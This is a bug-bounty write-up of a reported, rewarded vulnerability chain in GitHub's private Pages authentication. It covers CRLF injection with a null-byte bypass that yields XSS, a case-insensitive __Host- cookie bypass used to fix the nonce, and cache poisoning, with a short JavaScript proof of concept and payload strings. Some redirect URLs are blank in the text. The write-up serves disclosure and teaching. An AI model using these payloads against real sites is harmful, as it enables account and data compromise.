How to hack GitHub and make $35,000?

When I found and reported this vulnerability, it became my first paid bug report on HackerOne. The $35,000 is also the highest award I have received on HackerOne (and, I believe, the highest payout from GitHub to date). Many bug finds look like a mix of luck and intuition. In this post I will walk through how I thought while approaching the target.

How the story began

Covid struck in the spring of my first year of high school. With nothing to do between online classes, I started hunting for bugs. This particular award was for reporting a vulnerability in private GitHub Pages as part of GitHub's bug bounty program. In particular, there were two CTF (capture the flag) bonuses:

  • $10,000: read the flag without user interaction, plus a $5,000 bonus for doing it from an account outside the private organization.

  • $5,000: read the flag with user interaction.

Authentication flow

GitHub Pages sites are hosted on a separate domain, so GitHub's authentication cookies are not sent to the private page server. Without additional integration, private page authentication therefore has no way of identifying the user, so GitHub created its own authentication flow, and with it introduced the possibility of bugs. At the time of the report, that flow looked like this:

And now for more details.

When visiting a private page, the server checks whether the __Host-gh_pages_token cookie exists. If it is not set, or is set incorrectly, the private page server redirects to… This initial redirect also sets a nonce, which is stored in the __Host-gh_pages_session cookie.

Note that this cookie uses the __Host- cookie prefix which, in theory, as additional defense in depth, prevents it from being set from JavaScript on a parent domain.

/login redirects to /pages/auth?nonce=&page_id=&path=… This endpoint then generates a temporary authentication token, which it passes along in the token parameter; nonce, page_id, and path are forwarded in the same way.

/redirect just redirects to… This last endpoint then sets the authentication cookies for the domain: __Host-gh_pages_token and __Host-gh_pages_id. It also validates the nonce against the previously set __Host-gh_pages_session.

Throughout the entire authentication flow, information such as the original request path and the page ID is carried in the request parameters – path and page_id respectively. The nonce is passed in the nonce parameter. While the authentication flow may have changed slightly (in part because of this report), the general idea remains the same.
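The redirect chain can be sketched roughly like this (the domain names and helper functions below are illustrative assumptions of mine, not GitHub's actual code):

```javascript
// Hypothetical sketch of the private-pages auth flow. The domains
// "github.example" and "private-page.example" are placeholders.

// Step 1: the page server sees no token cookie, generates a nonce,
// stores it in __Host-gh_pages_session, and redirects to /pages/auth.
function buildAuthRedirect(nonce, pageId, path) {
  const params = new URLSearchParams({ nonce, page_id: pageId, path });
  return "https://github.example/pages/auth?" + params.toString();
}

// Step 2: /pages/auth mints a temporary token and bounces back to the
// page server, forwarding nonce, page_id and path unchanged.
function buildTokenRedirect(token, nonce, pageId, path) {
  const params = new URLSearchParams({ token, nonce, page_id: pageId, path });
  return "https://private-page.example/__/auth?" + params.toString();
}

console.log(buildAuthRedirect("dea8c624", "12345", "/"));
console.log(buildTokenRedirect("tmp-token", "dea8c624", "12345", "/"));
```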


CRLF returns

The first vulnerability is a CRLF injection in the page_id request parameter.

Perhaps the best way to find vulnerabilities is to play around. While researching the authentication flow, I noticed that the parsing of page_id seemed to ignore whitespace. Interestingly, the parameter was also rendered directly into the Set-Cookie header. For example, page_id=12345%20 returned this:

Set-Cookie: __Host-gh_pages_id=12345 ; Secure; HttpOnly; path=/

The pseudocode is presumably something like this:

page_id = query.page_id
# the raw value is reflected into a response header first...
set_header("Set-Cookie: __Host-gh_pages_id=" + page_id + "; Secure; HttpOnly; path=/")
# ...and only afterwards parsed as an integer
page_id = parse_int(page_id)

In other words, page_id is parsed as an integer but is also reflected directly into the Set-Cookie header. The problem was that we could not render arbitrary text directly: even though we had a classic CRLF injection, any non-whitespace character broke the parsing entirely. We could interrupt the authentication flow by sending page_id=12345%0d%0a%0d%0a, but beyond an interesting response there was no immediate impact:

; Secure; HttpOnly; path=/
Cache-Control: private

Additional note: the Location header is added after Set-Cookie, so our injection pushes Location out of the sent HTTP headers. The response is still a 302 redirect, but the Location header is now ignored and the body content gets rendered.
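To make the header-splitting mechanics concrete, here is a minimal sketch of my own (not GitHub's code) of a server that naively interpolates page_id into Set-Cookie:

```javascript
// Sketch: a response builder that interpolates page_id into Set-Cookie
// without sanitizing it. CRLF sequences in the value become new lines,
// and %0d%0a%0d%0a terminates the header block early.
function buildResponse(pageId) {
  return [
    "HTTP/1.1 302 Found",
    "Set-Cookie: __Host-gh_pages_id=" + pageId + "; Secure; HttpOnly; path=/",
    "Location: /redirect",
    "",
    "",
  ].join("\r\n");
}

// A benign value keeps everything inside the header block...
console.log(buildResponse("12345"));

// ...but a CRLF-injected value ends the headers early, pushing the
// cookie attributes and the Location header into the response body.
console.log(buildResponse("12345\r\n\r\n"));
```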

From rags to riches

After poking around a bit in GitHub Enterprise (which gave access to some of the source code), I suspected that the private page server was implemented on OpenResty, the Nginx-based platform. Being relatively low-level, it might well have problems with null bytes. And trying costs nothing, right?

It turned out that adding a null byte does interrupt the integer parsing. In other words, we can pass a payload like this:

"?page_id=" + encodeURIComponent("\r\n\r\n\x00<script>alert(origin)</script>")

Here comes the XSS!

Note that if a null byte appears in a header, the response is rejected. Thus the null byte must come at the very beginning of the body, which means we cannot perform a header-injection attack.
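My mental model of the parser, simulated in JavaScript (an assumption about the server's behavior, not its actual code):

```javascript
// Simulate a NUL-terminated, whitespace-tolerant integer parser.
// Everything after the first null byte is invisible to a C-style
// string routine, so the value still parses cleanly.
function parsePageId(raw) {
  // a C-style string ends at the first null byte
  const visible = raw.split("\u0000")[0];
  // whitespace around the digits is tolerated; anything else breaks parsing
  if (!/^\s*\d+\s*$/.test(visible)) return null;
  return parseInt(visible, 10);
}

console.log(parsePageId("12345 "));        // whitespace is ignored
console.log(parsePageId("12345<script>")); // null: a stray character breaks parsing
console.log(parsePageId("12345\u0000<script>alert(origin)</script>")); // 12345: payload hidden behind the NUL
```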

We have achieved execution of arbitrary JavaScript on a private page domain. The only problem is that we need a way to get around the nonce. The page_id and path parameters are known, but the nonce prevents us from sending victims into the authentication flow with a poisoned page_id. We need to either fix or predict the nonce.

Bypassing nonce

The first observation is that sibling subdomains of the same organization can set cookies on one another. This is because * is not in the public suffix list… Thus, cookies set on one sibling subdomain are passed along to the others.

The nonce would be easy to bypass if we could somehow get around the __Host- prefix protection: just set a fake nonce from a page on a sibling subdomain, and the value will be passed along. Fortunately, this prefix is not enforced in all browsers…

Well, okay… "not in all" is an overstatement: it seems that only IE is vulnerable to this workaround, so that is not good enough. What about attacking the nonce itself? Its generation looks solid and, to be honest, cryptography is not my forte; finding a weakness in the entropy behind the nonce seemed unlikely no matter what. How, then, do we fix the nonce?

Let’s go back to the source – the RFC. Eventually I came across an interesting question: how are cookie names normalized? In particular, how should cookies be handled with respect to case – is "__HOST-" the same as "__Host-"? It is easy to check that browsers treat cookies of different case differently:

document.cookie = "__HOST-Test=1"; // works: the prefix check is case-sensitive
document.cookie = "__Host-Test=1"; // fails: __Host- requires Secure and path=/

It turns out that the GitHub private page server ignored case when parsing cookies, giving us a prefix bypass. Now let’s put together a proof of concept for the XSS attack!

const id = location.search.slice("?id=".length);

document.cookie = "__HOST-gh_pages_session=dea8c624-468f-4c5b-a4e6-9a32fe6b9b15;";
location = "" + id + "%0d%0a%0d%0a%00<script>alert(origin)%3c%2fscript>&path=Lw";
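The server-side half of the bypass – a cookie parser that ignores case – might look like this sketch (my illustration of the flaw, not GitHub's actual parser):

```javascript
// Hypothetical server-side cookie parser that lowercases names before
// matching. The browser's __Host- protections are case-sensitive, so an
// attacker on a sibling subdomain can set "__HOST-gh_pages_session"
// from JS, and a parser like this accepts it as the real session cookie.
function getCookie(cookieHeader, name) {
  for (const pair of cookieHeader.split("; ")) {
    const eq = pair.indexOf("=");
    const key = pair.slice(0, eq);
    if (key.toLowerCase() === name.toLowerCase()) return pair.slice(eq + 1);
  }
  return null;
}

const header = "__HOST-gh_pages_session=attacker-fixed-nonce";
console.log(getCookie(header, "__Host-gh_pages_session")); // "attacker-fixed-nonce"
```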

This was already enough to earn the $5,000 bonus. But I wanted to see if I could push it further.

Poisoning the cache

And here is another design flaw: it turned out that responses from the /__/auth endpoint were cached based only on the parsed integer value of page_id. In itself this is harmless: the token set by this endpoint is scoped to the private page and carries no other privileges.

At the same time, this design practice is somewhat questionable: if these tokens ever acquired additional privileges, the caching could become a source of security problems.

Regardless, such caching is an easy way to escalate the attack. Since the cache key is the parsed integer value, a successful cache-poisoning attack with an XSS payload could affect other users who never even interacted with the malicious payload, as shown below:

The attacker has access to one private page and wants to reach others… He attacks the authentication flow, and the XSS payload is cached.

When a privileged user visits the page, they are hit by the XSS on its domain… Since cookies can be set on the shared parent domain, the attacker can now pivot and attack further pages.

These actions let any attacker with read permissions on a private page persistently attack that page’s authentication flow. Wow!
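The core of the flaw can be sketched like this (my simplification, not GitHub's code): the cache key is the parsed integer, while the cached response was built from the raw value.

```javascript
// Sketch: the cache is keyed on the *parsed* page_id, but the cached
// response reflects the attacker's *raw* page_id. A later victim
// requesting the clean "12345" receives the poisoned entry.
const cache = new Map();

function handleAuth(rawPageId) {
  const key = parseInt(rawPageId, 10); // cache key: parsed integer only
  if (!cache.has(key)) {
    // the response reflects the raw value, CRLF/NUL payload included
    cache.set(key, "Set-Cookie: __Host-gh_pages_id=" + rawPageId + "; Secure");
  }
  return cache.get(key);
}

// The attacker primes the cache with a poisoned response...
handleAuth("12345\r\n\r\n\u0000<script>alert(origin)</script>");
// ...and a victim asking for the clean id gets the same entry.
console.log(handleAuth("12345"));
```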

Public and private pages

To claim the $15,000 in bonuses, the attack has to be executed from a user account that is not in the organization. And we are in luck: we can abuse what appears to be another configuration error – the division of pages into “public” and “private”.

A misconfiguration of private pages allows public repositories to have “private” pages of their own. After the standard authentication, these pages are open to everyone: if an organization has such a public-private page, it is readable by any GitHub user. Access can be obtained like this:

This happens when a private page’s repository is made public. The situation is quite plausible: for example, an organization may initially create a private repository with a corresponding private page, and later decide to open-source the project by switching the repository to public.

Combined with the above, this means that an unprivileged user outside the organization can, via such a public-private page, compromise the authentication flows of internal private pages.

Overall, this makes a good proof of concept of how an outsider can leverage an employee inside the organization to pivot to other private pages.

This is how we earned the maximum CTF bonus. Persistence can be achieved through cache poisoning or other techniques, which we leave as an exercise for the reader.


This vulnerability was rated high severity with a base payout of $20,000; with the CTF bonuses, we earned $35,000. It is pretty cool that a relatively little-known vulnerability class like CRLF injection surfaced on GitHub. Although most of GitHub’s code is written in Ruby, some components, such as private page authentication, are not written in that language and may be vulnerable to low-level attacks. In general, wherever there are complex interactions, mistakes are just waiting to be found.

The discovered vulnerability seems like one in a million: like threading a needle, a whole series of events has to line up. At the same time, I think that finding something like this takes reasonably developed intuition and skills.
